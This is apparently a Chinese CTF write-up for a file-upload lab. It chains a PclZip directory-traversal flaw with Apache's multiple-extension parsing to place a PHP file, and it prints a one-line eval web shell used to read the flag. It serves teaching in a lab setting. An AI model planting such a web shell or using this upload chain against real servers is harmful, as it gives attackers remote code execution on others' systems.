01 CTFer 文件上传
环境搭建
使用 kali 编辑文件 docker-compose.yml
vim docker-compose.yml
写入以下内容
version: '3.2'
services:
upload:
image: registry.cn-hangzhou.aliyuncs.com/n1book/web-upload:latest
ports:
- 80:80
拉取
sudo docker-compose up -d
源码分析
接收上传的文件
$file = $_FILES['file'];
获取文件名
$name = $file['name'];
定义上传的目录
$dir = 'upload/';
返回文件后缀
$ext = strtolower(substr(strrchr($name, '.'), 1));
-
strrchr($name, '.')
返回$name
中最后一次出现的.
及之后的字符串如
1.php.gjl
返回.gjl
1.php
返回.php
-
substr(strrchr($name, '.'), 1)
substr 的第一个索引值为 0,此处截取索引值包括 1 之后的所有字符,即去除
strrchr($name, '.')
返回的后缀中的.
-
最后
strtolower
将去除.
后的扩展名转为小写
上述代码中,如果上传的文件后缀为 zip
则会对其进行特殊的处理
- 使用 PclZip 类来解压上传的 zip 文件,并将其内容提取到指定的目录
$temp_dir
。pclzip存在目录穿越问题 - 在解压之前,会遍历压缩包内的文件列表,如果发现文件名以
.php
结尾,则输出错误信息并终止程序。 - 解压完成后,会检查目标目录
$dir
是否存在,如果不存在则创建该目录。 - 最后输出上传成功的信息。
文件上传位置的上一级目录名随机生成,无法获取上传文件的具体位置,此处利用目录穿越返回上级目录
pclzip 目录穿越漏洞
当 pclzip 函数解压文件时,如果文件名前为 ../
会解析执行,解压到上级目录
上传的文件所在目录为 upload/随机目录/
当压缩包内文件名为 ../../文件
时,会解压到根目录
但是当向文件名中加入 /
时会报错,需要使用到 010 editor
apache 文件解析漏洞
当访问的页面不存在时,根据返回的错误信息可以知道网站使用的时 apache
Apache 具有文件解析漏洞
文件解析漏洞涉及一个解析文件的特性:Apache默认一个文件可以有多个以点分隔的后缀,当右边的后缀无法识别(不在mime.types内),则继续向左识别。
当我们请求一个文件:1.php.xxx.yyy
yyy -> 无法识别,向左
xxx -> 无法识别,向左
php -> 可以识别,交给 php 处理该文件
漏洞利用
编写一句话木马
<?php @eval($_REQUEST[777]);?>
命名 xxxxxx1.php.gjl
使用 .gjl
后缀可以绕过过滤,而在 apache 解析时, .gjl
后缀无法解析,会当作 .php
文件解析
xxxxxx
用于占位,接下来使用 010 editor 更改为 ../../
压缩
改压缩包内文件名
xxxxxx
改为 ../../
,Ctrl+s 保存
上传文件
访问文件 /1.php.gjl
,获取 flag